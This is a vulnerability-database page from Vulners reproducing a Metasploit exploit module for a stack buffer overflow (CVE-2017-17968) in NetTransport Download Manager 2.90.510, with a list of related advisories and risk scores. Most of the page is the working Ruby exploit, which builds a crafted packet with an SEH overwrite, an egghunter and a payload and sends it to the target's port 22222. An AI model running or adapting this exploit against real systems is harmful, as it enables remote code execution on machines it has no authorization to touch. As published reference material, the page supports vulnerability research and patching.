Vulners
Lucene search
NetTransport Download Manager 2.90.510 Buffer Overflow
| Reporter | Title | Published | Views | Family All 11 |
|---|---|---|---|---|
 | NetTransport 2.96L - Buffer Overflow (DEP Bypass) Exploit | 29 Dec 201700:00 | – | zdt |
 | CVE-2017-17968 | 29 May 201815:50 | – | circl |
 | NetTransport Download Manager Buffer Overflow Vulnerability | 2 Jan 201800:00 | – | cnvd |
 | CVE-2017-17968 | 29 Dec 201715:00 | – | cve |
 | CVE-2017-17968 | 29 Dec 201715:00 | – | cvelist |
 | NetTransport 2.96L - Remote Buffer Overflow (DEP Bypass) | 29 Dec 201700:00 | – | exploitdb |
 | NetTransport 2.96L - Remote Buffer Overflow (DEP Bypass) | 29 Dec 201700:00 | – | exploitpack |
 | CVE-2017-17968 | 29 Dec 201715:29 | – | nvd |
 | CVE-2017-17968 | 29 Dec 201715:29 | – | osv |
 | NetTransport Download Manager 2.96L Buffer Overflow | 28 Dec 201700:00 | – | packetstorm |
10
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = NormalRanking
include Msf::Exploit::Remote::Tcp
include Msf::Exploit::Egghunter
include Msf::Exploit::Remote::Seh
def initialize(info = {})
super(update_info(info,
'Name' => 'NetTransport Download Manager 2.90.510 Buffer Overflow',
'Description' => %q{
This exploits a stack buffer overflow in NetTransport Download Manager,
part of the NetXfer suite. This module was tested
successfully against version 2.90.510.
},
'Author' =>
[
'Lincoln',
'dookie',
],
'License' => MSF_LICENSE,
'References' =>
[
[ 'CVE', '2017-17968' ],
[ 'OSVDB', '61435' ],
[ 'EDB', '10911'],
],
'Privileged' => false,
'DefaultOptions' =>
{
'EXITFUNC' => 'seh'
},
'Payload' =>
{
'Space' => 5000,
'BadChars' => "\x00\x20\x0a\x0d",
'StackAdjustment' => -3500,
'DisableNops' => 'True'
},
'Platform' => 'win',
'Targets' =>
[
[ 'Windows Universal', { 'Ret' => 0x10002a57 } ], # p/p/r libssl.dll
],
'DefaultTarget' => 0,
'DisclosureDate' => '2010-01-02'))
register_options(
[
Opt::RPORT(22222)
])
end
def exploit
connect
magic_packet = "\xe3\x3d\x00\x00\x00\x01\xee\x4f\x08\xe3\x00\x0e\xae\x41\xb0\x24"
magic_packet << "\x89\x38\x1c\xc7\x6f\x6e\x00\x00\x00\x00\xaf\x8d\x04\x00\x00\x00"
magic_packet << "\x02\x01\x00\x01\x04\x00\x74\x65\x73\x74\x03\x01\x00\x11\x3c\x00"
# Unleash the Egghunter!
eh_stub, eh_egg = generate_egghunter(payload.encoded, payload_badchars, { :checksum => true })
sploit = magic_packet
sploit << rand_text_alpha_upper(119)
sploit << generate_seh_record(target.ret)
sploit << make_nops(10)
sploit << eh_stub
sploit << make_nops(50)
sploit << eh_egg
print_status("Trying target #{target.name}...")
sock.put(sploit)
handler
disconnect
end
end
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
02 Oct 2020 20:00Current
7.4High risk
Vulners AI Score7.4
CVSS 210
CVSS 39.8
EPSS0.54586